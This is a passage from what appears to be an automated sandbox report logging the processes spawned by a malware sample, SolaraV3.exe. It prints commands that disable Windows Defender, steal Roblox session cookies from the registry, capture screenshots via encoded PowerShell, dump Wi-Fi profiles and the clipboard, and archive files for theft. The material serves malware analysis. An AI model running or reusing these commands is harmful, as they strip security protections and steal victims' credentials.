FIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePathJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
